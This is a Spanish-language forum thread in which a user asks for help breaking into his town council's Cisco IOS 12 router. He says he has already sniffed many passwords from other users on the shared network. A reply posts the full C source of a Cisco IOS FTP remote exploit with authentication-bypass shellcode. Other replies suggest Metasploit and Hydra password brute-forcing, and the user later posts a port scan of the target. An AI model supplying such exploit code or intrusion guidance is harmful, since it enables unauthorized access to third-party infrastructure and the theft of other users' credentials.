Autor
|
Tema: Hackear un router Cisco IOS 12 X ...Porfavor ayuda... (Leído 15,274 veces)
|
|Fenix|
Desconectado
Mensajes: 14
El conocimiento humano pertenece al mundo
|
Hola a todos. Es mi primer post a ver como sale. Yo vivo en una población en la que el ayuntamiento tiene Internet para todos los que quieran abonarse, me gustaría acceder a su router que es un Cisco IOS 12 x e leído en varios foros que tiene bugs pero todos para acceder vía Web, mi problema este router tiene el puerto Web cerrado, solo es accesible vía TELNET. Soy miembro de la red y coloque un sniffer, saco montones de contraseñas de toda la red pero nunca acceden al router, que puedo hacer? Como saco la contraseña TELNET? No tiene puesta las claves por defecto y llevo mas de dos meses con el sniffer sin resultado, el user no me lo pide tan solo el pass Gracias de antemano por vuestra ayuda.
|
|
|
En línea
|
[Generator] Generator=SWFText [Movie] Width=400 Height=200 Speed=12 ShowBorder=0 ShowMenu=0 AddPreload=0 ProtectImport=1 CompressMovie=1 [Background] Mode=2 Color=0 StartColor=16777215 EndColor=0 Type=0 Rotation=0 Image=C:\Users\Fenix\Fenix.jpg Position=0 Quality=80 [BackEffect] UseEffect=1 Effect=Cloud Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou
|
|
|
Jarmen Kell
|
prueba con algún exploit de metasploit, en backtrack hay mogollon de programas para cisco
|
|
|
En línea
|
R00T@LinuX# ps -e | grep bill 5446 ? 00:00:00 bill-gates R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!
|
|
|
|Fenix|
Desconectado
Mensajes: 14
El conocimiento humano pertenece al mundo
|
Podrias decirme alguno en especial? Esque no me entiendo demasiado bien con el tema hack. Porfavor dime alguno en particular que sirviera para el Cisco IOS 12 X. Gracias por anticipado
|
|
|
En línea
|
[Generator] Generator=SWFText [Movie] Width=400 Height=200 Speed=12 ShowBorder=0 ShowMenu=0 AddPreload=0 ProtectImport=1 CompressMovie=1 [Background] Mode=2 Color=0 StartColor=16777215 EndColor=0 Type=0 Rotation=0 Image=C:\Users\Fenix\Fenix.jpg Position=0 Quality=80 [BackEffect] UseEffect=1 Effect=Cloud Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou
|
|
|
Jarmen Kell
|
/*
Cisco IOS FTP server remote exploit by Andy Davis 2008 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router Removes the requirement to authenticate and escalates to level 15 ********************************************************************* To protect the innocent a critical step has been omitted, which means the shellcode will only execute when the router is attached to gdb. I'm sure the PowerPC shellcoders out there will work it out... ********************************************************************* Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent on the original IOS security research iosftpexploit <at> googlemail 'dot' com
*/
#include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h>
#define PORT 21
int main(int argc, char **argv) { unsigned char sendbuf[] =
"MKD "
/* .equ vty_info, 0x8182da60 # pointer to VTY info */ /* .equ terminate, 0x80e4086c # kill a process */
"\x3c\x80\x81\x83" /* lis 4,vty_info@ha */ "\x38\x84\xda\x60" /* la 4,vty_info@l(4) */ "\x7d\x08\x42\x78" /* xor 8,8,8 */ "\x7c\xe4\x40\x2e" /* lwzx 7,4,8 */ "\x91\x07\x01\x74" /* stw 8,372(7) */ "\x39\x08\xff\xff" /* subi 8,8,1 */ "\x38\xe7\x09\x1a" /* addi 7,7,233 */ "\x91\x07\x04\xca" /* stw 8,1226(7) */ "\x7d\x03\x43\x78" /* mr 3,8 */ "\x3c\x80\x80\xe4" /* lis 4,terminate@ha */ "\x38\x84\x08\x6c" /* la 4,terminate@l(4) */ "\x7c\x89\x03\xa6" /* mtctr 4 */ "\x4e\x80\x04\x20" /* bctr */
/* exists cleanly without adversely affecting the FTP server */
"\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */ "\x61\x61\x61\x61" /* padding */
"\x80\x06\x23\xB8" /* return address */ "\x0d\x0a";
/* trampoline code */ /* when the overflow occurs r26+0x14 points to the shellcode */ /* 0x800623B8 lwz 26, 20(26) 0x800623BC mtctr 26 0x800623C0 mr 3, 27 0x800623C4 bctrl */
unsigned char recvbuf[256]; struct sockaddr_in servaddr; int s;
if (argc != 2) { printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("\nUsage: %s <target IP address>\n",argv[0]); exit(-1); }
servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = inet_addr(argv[1]); servaddr.sin_port = htons(PORT);
s = socket(AF_INET, SOCK_STREAM, 0); connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr)); printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n"); printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n"); printf ("Sending exploit...\n\n");
if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0) { printf("Error sending packet...quitting\n\n"); exit (1); } recv (s, recvbuf, sizeof(recvbuf)-1,0); printf ("Now telnet to the router for a shell...\n\n"); }
// milw0rm.com [2008-07-29]
|
|
|
En línea
|
R00T@LinuX# ps -e | grep bill 5446 ? 00:00:00 bill-gates R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!
|
|
|
|Fenix|
Desconectado
Mensajes: 14
El conocimiento humano pertenece al mundo
|
Muchas gracias, pero podrias indicarme como se usa ese codigo??que tengo que hacer exactamente con el?? Ademas el codigo parece que es para FTP y lo necesito para TELNET. Espero que perdones lo inesperto que soy en este tema, pero te agradezco muchisimo tu esfuerzo. Responde cuanto antes porfavor, gracias por anticipado
|
|
« Última modificación: 5 Febrero 2009, 12:48 pm por |Fenix| »
|
En línea
|
[Generator] Generator=SWFText [Movie] Width=400 Height=200 Speed=12 ShowBorder=0 ShowMenu=0 AddPreload=0 ProtectImport=1 CompressMovie=1 [Background] Mode=2 Color=0 StartColor=16777215 EndColor=0 Type=0 Rotation=0 Image=C:\Users\Fenix\Fenix.jpg Position=0 Quality=80 [BackEffect] UseEffect=1 Effect=Cloud Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou
|
|
|
Jarmen Kell
|
me extraña que no esté abierto el puerto 21...
|
|
|
En línea
|
R00T@LinuX# ps -e | grep bill 5446 ? 00:00:00 bill-gates R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!
|
|
|
|Fenix|
Desconectado
Mensajes: 14
El conocimiento humano pertenece al mundo
|
No, no lo tiene abierto estoy totalmente seguro. Saves la manera de colarme o el codigo para telnet??? Gracias por anticipado amigo.
|
|
|
En línea
|
[Generator] Generator=SWFText [Movie] Width=400 Height=200 Speed=12 ShowBorder=0 ShowMenu=0 AddPreload=0 ProtectImport=1 CompressMovie=1 [Background] Mode=2 Color=0 StartColor=16777215 EndColor=0 Type=0 Rotation=0 Image=C:\Users\Fenix\Fenix.jpg Position=0 Quality=80 [BackEffect] UseEffect=1 Effect=Cloud Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou
|
|
|
Jarmen Kell
|
no se me ocurre nada, lo mismo puedes sacar la pass de telnet con hydra.... no lo he probado
|
|
|
En línea
|
R00T@LinuX# ps -e | grep bill 5446 ? 00:00:00 bill-gates R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!
|
|
|
|Fenix|
Desconectado
Mensajes: 14
El conocimiento humano pertenece al mundo
|
Ok de todas formas gracias por tu ayuda. Y no hay nadie masss por aqui??? que pueda echarme una mano?????? Porfavor contesten es importanteeeee graciassss!!!!!
|
|
|
En línea
|
[Generator] Generator=SWFText [Movie] Width=400 Height=200 Speed=12 ShowBorder=0 ShowMenu=0 AddPreload=0 ProtectImport=1 CompressMovie=1 [Background] Mode=2 Color=0 StartColor=16777215 EndColor=0 Type=0 Rotation=0 Image=C:\Users\Fenix\Fenix.jpg Position=0 Quality=80 [BackEffect] UseEffect=1 Effect=Cloud Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou
|
|
|
|Fenix|
Desconectado
Mensajes: 14
El conocimiento humano pertenece al mundo
|
Despues de un escaneo con Zenmap a la ip tiene abierto los siguientes puertos: 7/tcp open echo 9/tcp open discard? 13/tcp open daytime Cisco router daytime 19/tcp open chargen 23/tcp open telnet Cisco router 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 2001/tcp open telnet Cisco router 6001/tcp open tcpwrapped hay alguna otra manera de acceder al router???? gracias amigos por anticipado
|
|
|
En línea
|
[Generator] Generator=SWFText [Movie] Width=400 Height=200 Speed=12 ShowBorder=0 ShowMenu=0 AddPreload=0 ProtectImport=1 CompressMovie=1 [Background] Mode=2 Color=0 StartColor=16777215 EndColor=0 Type=0 Rotation=0 Image=C:\Users\Fenix\Fenix.jpg Position=0 Quality=80 [BackEffect] UseEffect=1 Effect=Cloud Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou
|
|
|
|
|